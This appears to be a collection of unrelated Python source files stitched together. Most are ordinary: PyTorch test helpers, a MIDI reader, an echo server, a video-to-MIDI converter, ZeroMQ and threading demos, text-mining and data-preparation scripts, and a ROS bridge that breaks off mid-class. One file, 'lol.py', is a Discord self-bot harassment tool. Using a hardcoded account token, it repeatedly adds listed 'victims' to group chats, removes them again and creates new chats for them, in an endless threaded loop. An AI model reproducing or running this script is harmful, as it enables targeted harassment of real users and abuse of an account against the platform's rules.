# Tentative value for nondet_tol for gradcheck when backward implementation
# relies on nondeterministic operations, i.e., those listed here:
# https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html
#
# For more information see https://github.com/pytorch/pytorch/issues/56202
GRADCHECK_NONDET_TOL = 1e-12
def gradcheck(fn, inputs, **kwargs):
# Wrapper around gradcheck that enables certain keys by default.
# Use this testing-internal gradcheck instead of autograd.gradcheck so that new features like vmap and
# forward-mode AD are tested by default. We create this wrapper because we'd like to keep new checks
# to be disabled to default for the public-facing api to avoid breaking user code.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradcheck.
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "0FF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradcheck(fn, inputs, **kwargs)
def gradgradcheck(fn, inputs, grad_outputs=None, **kwargs):
# Wrapper around gradgradcheck that enables certain keys by default
# See gradcheck above for an explanation of why we need something like this.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradgradcheck
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "0FF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
# default value override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradgradcheck(fn, inputs, grad_outputs, **kwargs)
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs, **kwargs):
# call assert function rather than returning a bool since it's nicer
# if we get whether this failed on the gradcheck or the gradgradcheck.
test_case.assertTrue(gradcheck(apply_fn, inputs, **kwargs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs, **kwargs))
@contextmanager
def set_cwd(path: str) -> Iterator[None]:
old_cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(old_cwd)
# Using @precisionOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
def _wrap_warn_once(regex):
def decorator(fn):
def inner(self, *args, **kwargs):
with self.assertWarnsOnceRegex(UserWarning, regex):
fn(self, *args, **kwargs)
return inner
return decorator
# This is a wrapper that wraps a test to run this test twice, one with
# coalesced=True, another with coalesced=False for coalesced/uncoalesced sparse tensors.
def coalescedonoff(f):
@wraps(f)
def wrapped(self, *args, **kwargs):
f(self, *args, **kwargs, coalesced=True)
f(self, *args, **kwargs, coalesced=False)
return wrapped
@contextlib.contextmanager
def disable_gc():
if gc.isenabled():
try:
gc.disable()
yield
finally:
gc.enable()
else:
yield
def find_library_location(lib_name: str) -> Path:
# return the shared library file in the installed folder if exist,
# else the file in the build folder
torch_root = Path(torch.__file__).resolve().parent
path = torch_root / 'lib' / lib_name
if os.path.exists(path):
return path
torch_root = Path(__file__).resolve().parent.parent.parent
return torch_root / 'build' / 'lib' / lib_name
def sandcastle_skip(reason):
"""
Similar to unittest.skip, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
return wrapper
return decorator
def mock_wrapper(method):
"""
Returns a function that calls the real implementation of a method
in addition to passing args to a mock object.
"""
mock = MagicMock()
@wraps(method)
def wrapper(self, *args, **kwargs):
mock(*args, **kwargs)
return method(self, *args, **kwargs)
wrapper.mock = mock # type: ignore[attr-defined]
return wrapper
def get_tensors_from(args, kwargs):
""" Returns a set of all Tensor objects in the given args and kwargs. """
return set([arg for arg in args if isinstance(arg, Tensor)] +
[v for v in kwargs.values() if isinstance(v, Tensor)])
# Returns scalar tensor representation of a list of integer byte values
def bytes_to_scalar(byte_list: List[int], dtype: torch.dtype, device: torch.device):
dtype_to_ctype: Dict[torch.dtype, Any] = {
torch.int8: ctypes.c_int8,
torch.uint8: ctypes.c_uint8,
torch.int16: ctypes.c_int16,
torch.int32: ctypes.c_int32,
torch.int64: ctypes.c_int64,
torch.bool: ctypes.c_bool,
torch.float32: ctypes.c_float,
torch.complex64: ctypes.c_float,
torch.float64: ctypes.c_double,
torch.complex128: ctypes.c_double,
}
ctype = dtype_to_ctype[dtype]
num_bytes = ctypes.sizeof(ctype)
def check_bytes(byte_list):
for byte in byte_list:
assert 0 <= byte <= 255
if dtype.is_complex:
assert len(byte_list) == (num_bytes * 2)
check_bytes(byte_list)
real = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[:num_bytes])).value
imag = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list[num_bytes:])).value
res = real + 1j * imag
else:
assert len(byte_list) == num_bytes
check_bytes(byte_list)
res = ctype.from_buffer((ctypes.c_byte * num_bytes)(
*byte_list)).value
return torch.tensor(res, device=device, dtype=dtype)
def has_breakpad():
# We always build with breakpad in CI
if IS_IN_CI:
return True
# If not on a special build, check that the library was actually linked in
try:
torch._C._get_minidump_directory() # type: ignore[attr-defined]
return True
except RuntimeError as e:
if "Minidump handler is uninintialized" in str(e):
return True
return False
def sandcastle_skip_if(condition, reason):
"""
Similar to unittest.skipIf, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE and condition:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
if condition and IS_SANDCASTLE:
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
else:
return func(*args, **kwargs)
return wrapper
return decorator
def dtype_name(dtype):
""" Returns the pretty name of the dtype (e.g. torch.int64 -> int64). """
return str(dtype).split('.')[1]
def set_single_threaded_if_parallel_tbb(fn):
"""Set test to be single threaded for parallel tbb.
See https://github.com/pytorch/pytorch/issues/64571#issuecomment-914691883
"""
if not IS_TBB:
return fn
@wraps(fn)
def wrap_fn(*args, **kwargs):
num_threads = torch.get_num_threads()
torch.set_num_threads(1)
try:
return fn(*args, **kwargs)
finally:
torch.set_num_threads(num_threads)
return wrap_fn
@functools.lru_cache()
def get_cycles_per_ms() -> float:
"""Measure and return approximate number of cycles per millisecond for torch.cuda._sleep
"""
def measure() -> float:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
cycles_per_ms = 1000000 / start.elapsed_time(end)
return cycles_per_ms
# Get 10 values and remove the 2 max and 2 min and return the avg.
# This is to avoid system disturbance that skew the results, e.g.
# the very first cuda call likely does a bunch of init, which takes
# much longer than subsequent calls.
#
# Tested on both Tesla V100, Quadro GP100, Titan RTX, RTX 3090 GPUs
# and seems to return stable values. Therefore, we enable caching
# using lru_cache decorator above.
num = 10
vals = []
for _ in range(num):
vals.append(measure())
vals = sorted(vals)
return mean(vals[2 : num - 2])
T = TypeVar('T')
def first_sample(self: unittest.TestCase, samples: Iterable[T]) -> T:
"""
Returns the first sample from an iterable of samples, like those returned by OpInfo.
The test will be skipped if no samples are available.
"""
try:
return next(iter(samples))
except StopIteration:
raise unittest.SkipTest('Skipped! Need at least 1 sample input')
|
aseqdump_test.py
|
import aseqdump
import threading
data = 0
Ch =0
def Note():
midi = aseqdump.aseqdump("24:0")
while 1:
onoff,key,velocity = midi.Note_get()
if(onoff == ""):
continue
print("Note: %s , %s , %s" % (onoff,key,velocity))
def Control():
global Ch
midi = aseqdump.aseqdump("24:2")
while 1:
Ch,value = midi.Control_get()
if(Ch == ""):
continue
print("Control: %s , %s" % (Ch,value))
def Pitch():
midi = aseqdump.aseqdump("24:1")
while 1:
Ch,value = midi.Pitch_get()
if(Ch == ""):
continue
print("Pitch: %s , %s" % (Ch,value))
thread_1 = threading.Thread(target=Note)
thread_1.start()
"""
thread_2 = threading.Thread(target=Control)
thread_2.start()
thread_3 = threading.Thread(target=Pitch)
thread_3.start()
"""
while 1:
pass
#print("0x%04X" % data)
#midi2 = aseqdump.aseqdump("24:2")
#Ch,value = midi2.Control_get()
#print("Control2: %s , %s " % (Ch,value))
|
lol.py
|
import requests, threading
from discord.ext import commands
client = commands.Bot(command_prefix=".", self_bot= True)
token = "token.YXvmcw.yuh-qvd6bsDfyb4gY"
users = ['811042929040687177','903621585053835275','791835116980666418','903244322181361755'] #users aka the victims
gcs = ['904174831707250750','904174832642568273','904174835285000262','904174878138204240','904174879862042624','904174881200041985','903624652549672980','903624649777233961','904120310272491530']
# gc ids ^^^^^ for inviting and kicking out
#t = input("threads: ")
#gc = int(input("gc you wanna fuck them in: "))
def login(): #making it automated i'll finish it up in the future
data = {}
@client.event
async def on_ready():
data['friendsID'] = [freind.id for freind in client.user.friends]
data['channelsID'] = [channel.id for channel in client.private_channels]
await client.close()
try:
client.run(token)
except Exception as error:
print(f"Incorrect Token", error)
return None
return data
def add(i2):
for i in users:
headers = {"Authorization": token}
r = requests.put(f'https://discordapp.com/api/v6/channels/{i2}/recipients/{i}', headers=headers)
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"added {i} to gc {i2}")
elif r.status_code == 429:
print(f"ratelimited")
def remove(i2):
for i in users:
headers = {"Authorization": token}
r = requests.delete(f'https://discordapp.com/api/v6/channels/{i2}/recipients/{i}', headers=headers)
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"removed {i} from gc {i2}")
elif r.status_code == 429:
print(f"ratelimited")
def creategc(): #gc create for ur victims
for i in users:
headers = {"Authorization": token}
json = {"recipients":['811042929040687177','903621585053835275','791835116980666418','903244322181361755']}
r = requests.post('https://discordapp.com/api/v6/users/@me/channels', headers=headers, json=json)
if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:
print(f"created gc")
elif r.status_code == 429:
print(f"ratelimited")
while True:
try:
for i2 in gcs:
threading.Thread(target=remove, args=(i2,)).start()
threading.Thread(target=add, args=(i2,)).start()
except:
print("process couldn't start")
|
echo-server-tcp.py
|
from __future__ import print_function
import os
import sys
import signal
import threading
import pyuv
if sys.version_info >= (3, 0):
LINESEP = os.linesep.encode()
else:
LINESEP = os.linesep
def on_read(client, data, error):
if data is None:
client.close()
clients.remove(client)
return
data = data.strip()
if not data:
return
client.write(data+LINESEP)
def on_connection(server, error):
client = pyuv.TCP(server.loop)
server.accept(client)
clients.append(client)
client.start_read(on_read)
def async_exit(async):
[c.close() for c in clients]
async.close()
signal_h.close()
server.close()
def signal_cb(handle, signum):
async.send()
print("PyUV version %s" % pyuv.__version__)
loop = pyuv.Loop.default_loop()
async = pyuv.Async(loop, async_exit)
clients = []
server = pyuv.TCP(loop)
server.bind(("0.0.0.0", 1234))
server.listen(on_connection)
signal_h = pyuv.Signal(loop)
signal_h.start(signal_cb, signal.SIGINT)
t = threading.Thread(target=loop.run)
t.start()
t.join()
print("Stopped!")
|
partial_converter.py
|
import json
import os
import sys
from multiprocessing import Process
import cv2
import matplotlib.pyplot as plt
import numpy as np
import py_midicsv as pm
sys.path.append('.')
from core import youtube2frames, frames2matrix, matrix2csv
def show_image(path):
image = cv2.imread(path)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
plt.imshow(image)
plt.show()
def show_frames(frame_dir, n_f):
index = int(n_f / 128)
while True:
p = Process(target=show_image, args=(f"{frame_dir}/frame_{index}.jpg",))
p.start()
ans = str(input(f"Is this frame ({index}) containing enough info? (Y/N): "))
if ans.lower() == 'y':
return
else:
index += int(n_f / 128)
def write_lines(file_name, lines):
open(file_name, 'w').close()
file = open(file_name, 'a')
for line in lines:
file.write(line)
file.close()
def prompt(variable_name: str, default):
value = input(f"[Default: {default}] Enter the {variable_name.replace('_', ' ')}: ")
if value.strip() == '':
value = default
return value if value.strip() != ' ' else default
def partial_convert(
video_name=None,
video_url=None,
tag=None,
first_note=None,
first_white_note_col=None,
tenth_white_note_col=None,
read_height=None,
left_hand_color=None,
right_hand_color=None,
background_color=None,
minimum_note_width=None,
video_dir_path=None,
frame_dir_path=None,
array_dir_path=None,
csv_dir_path=None,
midi_dir_path=None,
):
if None in locals().values():
print("Click enter to use default values.")
if video_name is None:
video_name = prompt('video_name', 'video name')
if video_url is None:
video_url = input("[No default] Enter the video url: ")
if video_dir_path is None:
video_dir_path = prompt('video_dir_path', f'./{video_name}')
if frame_dir_path is None:
frame_dir_path = prompt('frame_dir_path', f'./{video_name}/frames')
os.makedirs(video_dir_path, exist_ok=True)
print(f'Created the following directory: {video_dir_path}')
num_frames, fps = youtube2frames.get_frames(
video_url=video_url,
video_name=video_name,
video_dir_path=video_dir_path,
frame_dir_path=frame_dir_path,
tag=tag
)
if None in [first_note, first_white_note_col, tenth_white_note_col, read_height,
left_hand_color, right_hand_color, background_color, minimum_note_width]:
show_frames(frame_dir_path, num_frames)
if first_note is None:
first_note = prompt('first_note (capital)', 'A')
if first_white_note_col is None:
first_white_note_col = float(input("[No default] Enter the first white note column: "))
if tenth_white_note_col is None:
tenth_white_note_col = float(input("[No default] Enter the tenth white note column: "))
if read_height is None:
read_height = int(prompt('read_height', 50))
if left_hand_color is None:
left_hand_color = json.loads(input("Enter the left hand note's color in [R, G, B]: "))
if right_hand_color is None:
right_hand_color = json.loads(input("Enter the right hand note's color in [R, G, B]: "))
if background_color is None:
background_color = json.loads(input("Enter the background color in [R, G, B]: "))
if minimum_note_width is None:
minimum_note_width = int(input("Enter the minimum note width: "))
left_hand, right_hand = frames2matrix.Frames2MatrixConverter(
name=video_name,
frame_dir=frame_dir_path,
num_frames=num_frames,
read_height=read_height,
first_note=first_note,
first_white_note_col=first_white_note_col,
tenth_white_note_col=tenth_white_note_col,
left_hand_color=left_hand_color,
right_hand_color=right_hand_color,
background_color=background_color,
minimum_note_width=minimum_note_width
).convert()
if array_dir_path is None:
array_dir_path = prompt('array_dir_path', f'./{video_name}/arrays')
os.makedirs(array_dir_path, exist_ok=True)
print(f'Created the following directory: {array_dir_path}')
np.save(f'{array_dir_path}/left_hand.npy', left_hand)
np.save(f'{array_dir_path}/right_hand.npy', right_hand)
full_csv_lines, right_csv_lines, left_csv_lines = matrix2csv.matrix_to_csv(left_hand, right_hand, fps)
if csv_dir_path is None:
csv_dir_path = prompt('csv_dir_path', f'./{video_name}/csvs')
os.makedirs(csv_dir_path, exist_ok=True)
print(f'Created the following directory: {csv_dir_path}')
write_lines(f'{csv_dir_path}/{video_name}.csv', full_csv_lines)
write_lines(f'{csv_dir_path}/{video_name}_rh.csv', right_csv_lines)
write_lines(f'{csv_dir_path}/{video_name}_lh.csv', left_csv_lines)
if midi_dir_path is None:
midi_dir_path = prompt('midi_dir_path', f'./{video_name}')
os.makedirs(midi_dir_path, exist_ok=True)
print(f'Created the following directory: {midi_dir_path}')
# Parse the CSVs into a MIDI files, then save the parsed MIDI files
with open(f"{midi_dir_path}/{video_name}.mid", "wb") as output_file:
midi_object = pm.csv_to_midi(f'{csv_dir_path}/{video_name}.csv')
pm.FileWriter(output_file).write(midi_object)
with open(f"{midi_dir_path}/{video_name}_rh.mid", "wb") as output_file:
midi_object = pm.csv_to_midi(f'{csv_dir_path}/{video_name}_rh.csv')
pm.FileWriter(output_file).write(midi_object)
with open(f"{midi_dir_path}/{video_name}_lh.mid", "wb") as output_file:
midi_object = pm.csv_to_midi(f'{csv_dir_path}/{video_name}_lh.csv')
pm.FileWriter(output_file).write(midi_object)
|
__main__.py
|
from multiprocessing import Process
import os
import zmq
import time
def subscriber(pub_sub_addr):
context = zmq.Context()
sub_socket = context.socket(zmq.SUB)
sub_socket.connect(pub_sub_addr)
# forgot to subscribe
sub_socket.setsockopt(zmq.SUBSCRIBE, b"")
try:
while True:
item = sub_socket.recv_pyobj()
if item == None:
return
else:
print(f"Subscriber {os.getpid()}: {item}")
except KeyboardInterrupt:
pass
def publisher(pull_addr, pub_addr):
context = zmq.Context()
# pull
pull_socket = context.socket(zmq.PULL)
pull_socket.bind(pull_addr)
# push
pub_socket = context.socket(zmq.PUB)
pub_socket.bind(pub_addr)
try:
while True:
item = pull_socket.recv_pyobj()
if item == None:
break
else:
print(f"Publishing: {item}")
pub_socket.send_pyobj(item)
except KeyboardInterrupt:
pass
pub_socket.send_pyobj(None)
if __name__ == "__main__":
context = zmq.Context()
fan_in_addr = "ipc://./.push_pull.ipc"
pub_sub_addr = "ipc://./.pub_sub.ipc"
# start all sub scoekts before the PUB
subs = [Process(target=subscriber, args=(pub_sub_addr,)) for _ in range(4)]
for s in subs:
s.start()
p = Process(target=publisher, args=(fan_in_addr, pub_sub_addr))
p.start()
push_socket = context.socket(zmq.PUSH)
push_socket.connect(fan_in_addr)
try:
while True:
time.sleep(0.2)
cmd = input(">>> ")
if cmd == "exit":
break
push_socket.send_pyobj(cmd)
except KeyboardInterrupt:
pass
push_socket.send_pyobj(None)
p.join()
for s in subs:
s.join()
|
ThreadNeologism.py
|
#!/usr/bin/python3.7
# -*- coding: utf-8 -*-
# @Time : 2018/2/28 10:58
# @Email : jtyoui@qq.com
# @Software: PyCharm
import math
import re
from threading import Thread
import queue
ALL_WORDS = dict()
All_LENS = 0
class Neologism(Thread):
def __init__(self, q, split_num=4):
Thread.__init__(self)
self.queue = q
self.split_num = split_num
def run(self):
while True:
try:
line = self.queue.get_nowait()
self.read_string(line)
self.queue.task_done()
except queue.Empty:
return
def read_string(self, st, split_seq='[,。!?:]'):
"""讲字符按照split_seq格式来分割
:param st: 字符串
:param split_seq: 字符分割
"""
ls = re.split(split_seq, st)
self.read_ls(ls=ls)
def read_ls(self, ls):
"""数据类型[str]
:param ls: 表示链表
"""
global All_LENS
for word in ls:
All_LENS += len(word)
clean_data, lens = clean(data=word)
if lens > 2:
self.split(clean_data, lens)
def split(self, words, lens):
"""拆分字符,最大匹配num个字符,并也字典的形式返回,
[出现次数,出现频率,凝固程度,自由程度,关键字的左邻,关键字的右邻](作为信息熵的衡量)
"""
global ALL_WORDS
for i in range(0, lens):
for j in range(1, self.split_num + 1):
if i + j < lens:
key = words[i:i + j]
word = ALL_WORDS.get(key)
if word:
word[0] += 1
word[4].append(words[i - 1])
word[5].append(words[i + j])
else:
ALL_WORDS[key] = [1, 0.0, 1, 0, [words[i - 1]], [words[i + j]]]
def statistics(key_list): # 统计每个单词的频率
for key in key_list:
ALL_WORDS[key][1] = ALL_WORDS[key][0] / All_LENS
def handle(key_list):
"""处理数据
计算左邻字集合和右邻字集合的频率,左邻字信息熵和右邻字信息熵中的较小值
计算凝固程度,自由程度
"""
for key in key_list:
word_list = ALL_WORDS[key] # 获得一个单词的链表信息
if len(key) == 1:
continue
end_all = front_all = 0.0
left = word_list[1] / (ALL_WORDS[key[0]][1] * ALL_WORDS[key[1:]][1]) # 左邻字集合的频率
right = word_list[1] / (ALL_WORDS[key[-1]][1] * ALL_WORDS[key[:-1]][1]) # 右邻字集合的频率
for front in word_list[4]:
if ALL_WORDS.get(front):
front_all -= math.log(ALL_WORDS[front][1]) * ALL_WORDS[front][1] # 左邻字的信息熵
for end in word_list[5]:
if ALL_WORDS.get(end):
end_all -= math.log(ALL_WORDS[end][1]) * ALL_WORDS[end][1] # 右邻字的信息熵
# 左邻字集合和右邻字集合的频率相比较.谁越少说明该词语越容易接近谁
word_list[2] = left if left < right else right
# 左邻字集合的信息熵和右邻字集合的信息熵的相比较.谁的信息熵越少说明该集合提供的信息越大
word_list[3] = front_all if front_all < end_all else end_all
def filter_words(frequency, cond, free, flag):
"""过滤一些不重要的数据
[出现次数,出现频率,凝固程度,自由程度]
:param frequency: 过滤的频率
:param cond: 过滤凝聚度
:param free: 过滤自由度
:param flag: 是否是并且还是或者,默认是或者,满足一个就过滤
:return: 过滤后的数据字典
"""
key_words = dict()
for key in ALL_WORDS.keys():
if len(key) <= 1:
continue
one_word = ALL_WORDS[key]
if flag:
if one_word[1] > frequency and one_word[2] > cond and one_word[3] > free:
key_words[key] = [one_word[0], one_word[1], one_word[2], one_word[3]]
else:
if one_word[1] > frequency or one_word[2] > cond or one_word[3] > free:
key_words[key] = [one_word[0], one_word[1], one_word[2], one_word[3]]
return key_words
def read_file(file, file_encoding='utf-8'):
"""读取文件内容,注意文件是UTF-8的格式且不是BOM格式
:param file: 读取的文件
:param file_encoding: 文本编码
"""
queues = queue.Queue(maxsize=0)
with open(file, encoding=file_encoding) as fp:
for line in fp:
queues.put(line)
return queues
def clean(data):
# 去除非中文字符
words = [work for work in data if 19968 < ord(work) < 40959]
return ''.join(words), len(words)
def thread_analysis(file, thread_num=10, split_num=4, frequency=0.0001, cond=10, free=0.1, flag=False):
"""多线程启动分析
:param file: 训练的文本
:param thread_num: 线程数
:param split_num: 匹配个数
:param frequency: 频率
:param cond: 凝聚度
:param free: 自由度
:param flag: 是否是并且还是或者,默认是或者,满足一个就过滤
:return: 分析完毕的字典
"""
queues = read_file(file)
neologisms = [Neologism(split_num=split_num, q=queues) for _ in range(thread_num)]
for neologism in neologisms:
neologism.start()
queues.join()
keys_list = list(ALL_WORDS.keys())
size = len(keys_list) // split_num + 1
print("开始统计频率.........")
thread_open(split_num, statistics, keys_list, size)
print("开始处理数据.........")
thread_open(split_num, handle, keys_list, size)
print("开始过滤数据.........")
return filter_words(frequency, cond, free, flag)
def thread_open(split_num, target, keys_list, size):
"""开启多线程
:param split_num: 线程数
:param target: 被开启的方法
:param keys_list: 所有单词的键链表
:param size: 被分割成一块的大小
"""
threads = []
for i in range(split_num):
t = Thread(target=target, args=(keys_list[i * size:(i + 1) * size],))
threads.append(t)
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
neologism_words = thread_analysis(file='小时代.txt', thread_num=10, frequency=0.00001, split_num=8, cond=100,
flag=True)
for k, v in neologism_words.items():
print('key:{0} count:{1} frequency:{2} cond:{3} free:{4}'.format(k, v[0], v[1], v[2], v[3]))
|
VideoStream.py
|
# To make python 2 and python 3 compatible code
from __future__ import absolute_import
from threading import Thread
import time
import sys
if sys.version_info[0] < 3: # e.g python version <3
import cv2
else:
import cv2
# from cv2 import cv2
# import the Queue class from Python 3
if sys.version_info >= (3, 0):
from queue import Queue
# otherwise, import the Queue class for Python 2.7
else:
from Queue import Queue
# This class reads all the video frames in a separate thread and always has the keeps only the latest frame in its queue to be grabbed by another thread
class VideoStream(object):
def __init__(self, path, queueSize=3):
print('opening camera')
self.stream = cv2.VideoCapture(path)
# self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, 640)
# self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)
# self.stream.set(cv2.CAP_PROP_SETTINGS, 1 )
self.stopped = False
self.Q = Queue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
previousFrame = None
previousDiff = 0
delta = 0
skippedFrames = 0
queuedFrames = 0
try:
while True:
if self.stopped:
return
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
if previousFrame is None:
previousFrame = frame
continue
difference = cv2.subtract(frame, previousFrame)
b, g, r = cv2.split(difference)
diff = cv2.countNonZero(b) + cv2.countNonZero(g) + cv2.countNonZero(r)
delta = abs(diff - previousDiff)
if delta > 80000:
# Clean the queue
while not self.Q.empty():
self.Q.get()
self.Q.put(frame)
queuedFrames = queuedFrames + 1
previousFrame = frame
previousDiff = diff
else:
skippedFrames = skippedFrames + 1
time.sleep(0.15)
except Exception as e:
print("got error: "+str(e))
def read(self):
return self.Q.get(block=True)
def more(self):
return self.Q.qsize() > 0
def stop(self):
self.stopped = True
def __exit__(self, exception_type, exception_value, traceback):
self.stream.release()
|
prepare_data.py
|
import sys
sys.path.insert(0, '../')
import os
import errno
from collections import Counter
from setup.settings import preprocessing
from core.tokenizer import tokenize
from core.sentence import score_answers, replace_in_answers
from tqdm import tqdm
from itertools import zip_longest
from multiprocessing import Pool
from threading import Thread
import time
# Files to be prepared
# files = {
# 'train.from': {'amount': 1, 'up_to': -1}, # copy all of data (up to "samples")
# 'tst2012.from': {'amount': .1, 'up_to': preprocessing['test_size']}, # copy 1/10th but up to 'test_size'
# 'tst2013.from': {'amount': .1, 'up_to': preprocessing['test_size']},
# 'train.to': {'amount': 1, 'up_to': -1},
# 'tst2012.to': {'amount': .1, 'up_to': preprocessing['test_size']},
# 'tst2013.to': {'amount': .1, 'up_to': preprocessing['test_size']},
# }
files = {
'train.from': {'amount': 1, 'up_to': -1},
'train.to': {'amount': 1, 'up_to': -1}
}
vocab = Counter([])
# Prepare all files
def prepare():
global vocab
print("\nPreparing training set from raw set")
# Ensure that destination folder exists
try:
os.makedirs(preprocessing['train_folder'])
except OSError as e:
if e.errno != errno.EEXIST:
raise
# Iterate thru files and prepare them
for file_name, amounts in files.items():
vocab = Counter([])
print("\nFile: {} (iteration = 10k lines)".format(file_name))
# Output file handler
out_file = open('{}/{}'.format(preprocessing['train_folder'], file_name), 'w', encoding='utf-8',
buffering=131072)
# Maximum number of lines
read = 0
amount = int(min(amounts['amount'] * preprocessing['samples'] if preprocessing['samples'] > 0 else 10 ** 20,
amounts['up_to'] if amounts['up_to'] > 0 else 10 ** 20))
# Prepare thread variables
write_thread = None
vocab_thread1 = None
vocab_thread2 = None
# We are going to use multiprocessing for tokenization, as it's cpu intensive
with Pool(processes=preprocessing['cpu_count']) as pool:
# Open input file
with open('{}/{}'.format(preprocessing['source_folder'], file_name), 'r', encoding='utf-8',
buffering=131072) as in_file:
# Iterate every 10k lines
for rows in tqdm(read_lines(in_file, 10000, '')):
# Process using multiprocessing
rows = pool.map_async(tokenize, rows, 100).get()
# Join running threads from previous loop
if write_thread is not None:
write_thread.join()
vocab_thread1.join()
vocab_thread2.join()
# If number of lines greater than limit or EOF - break
# We are leaving before last save as we have to handle last batch diffrently
# zip_longest in read_lines adds extra empty lines up to batch size and we need to remove them
# but only for last batch - no need to do that for every batch
read += len(rows)
if read >= amount:
rows = rows[:amount-read+len(rows)]
break
assert len(rows) == 10000
# We are going to process vocab in two threads - a bit faster than one and we need shared memory
# Also multiprocessing is slower here
vocab_thread1 = Thread(target=append_vocab, args=(rows, 1))
vocab_thread1.start()
vocab_thread2 = Thread(target=append_vocab, args=(rows, 2))
vocab_thread2.start()
# And thread for saving tokenized data to putput file
write_thread = Thread(target=write_lines, args=(out_file, rows))
write_thread.start()
rows = []
# Last vocab parts and last lines to write
vocab_thread1 = Thread(target=append_vocab, args=(rows, 1))
vocab_thread1.start()
vocab_thread2 = Thread(target=append_vocab, args=(rows, 2))
vocab_thread2.start()
write_thread = Thread(target=write_lines, args=(out_file, rows))
write_thread.start()
vocab_thread1.join()
vocab_thread2.join()
write_thread.join()
out_file.close()
# If it's train file, make vocab
if file_name == 'train.from' or file_name == 'train.to':
# if file_name == 'train.from':
print("\nFile: {} (saving vocab)".format(file_name.replace('train', 'vocab')))
# Get most common entities
vocab = [entity for entity, v in vocab.most_common()]
# Do replacements
new_vocab = [replace_in_answers([entity], 'vocab')[0] for entity in vocab]
# Filter out duplicates and empty entities
vocab = set()
vocab = [entity for entity in new_vocab if not (entity in vocab or vocab.add(entity)) and entity]
# Write entities to a file
with open('{}/{}'.format(preprocessing['train_folder'], file_name.replace('train', 'vocab')), 'w',
encoding='utf-8', buffering=131072) as vocab_file:
vocab_file.write("<unk>\n<s>\n</s>\n" + "\n".join(vocab[:preprocessing['vocab_size']]))
with open('{}/{}'.format(preprocessing['train_folder'], file_name.replace('train', 'vocab_unused')), 'w',
encoding='utf-8', buffering=131072) as vocab_file:
vocab_file.write("\n".join(vocab[preprocessing['vocab_size']:]))
# Helper function, reads 'amount' number of lines from file handler
def read_lines(file, amount, fillvalue=None):
args = [iter(file)] * amount
return zip_longest(*args, fillvalue=fillvalue)
# Writle batch of lines to a file
def write_lines(file, lines):
# Handling empty lines (described above)
last = False
if not len(lines) or lines[-1] == '':
lines = list(filter(None, list(lines)))
last = True
file.write('\n'.join(lines) + ('' if last else '\n'))
# Append tokens to vocab
def append_vocab(lines, thread):
global vocab
# Split lines for that vocab thread
local_vocab = []
if thread == 1:
lines = lines[:5000]
else:
lines = lines[5000:]
# Add entities
for line in lines:
local_vocab.extend(line.split(' '))
# Add entities to vocab
vocab.update(local_vocab)
# Prepare training data set
if __name__ == "__main__":
prepare()
|
bridge.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from abc import ABCMeta, abstractmethod
import inject
import paho.mqtt.client as mqtt
import rospy
from .util import lookup_object, extract_values, populate_instance
from threading import Condition
from queue import Queue
from uuid import uuid4
from threading import Thread
def create_bridge(factory, **kwargs):
u""" bridge generator function
:param (str|class) factory: Bridge class
:param kwargs: bridge-specific arguments
:return Bridge: bridge object
"""
if isinstance(factory, basestring):
factory = lookup_object(factory)
if not issubclass(factory, Bridge):
raise ValueError("factory should be Bridge subclass")
return factory(**kwargs)
class Bridge(object):
u""" Bridge base class
:param mqtt.Client _mqtt_client: MQTT client
:param _serialize: message serialize callable
:param _deserialize: message deserialize callable
"""
__metaclass__ = ABCMeta
_mqtt_client = inject.attr(mqtt.Client)
_serialize = inject.attr('serializer')
_deserialize = inject.attr('deserializer')
_extract_private_path = inject.attr('mqtt_private_path_extractor')
class DynamicBridgeServer(Bridge):
u""" Dynamic Bridge Server that serves as the remote end to PublishBridge
and SubscribeBridge, as well as the RemoteService. Should always be instantiated if
indeed the purpose is bridging between ROS-sides.
"""
def __init__(self, control_topic="__dynamic_server"):
self._control_topic = control_topic + '/topic/#'
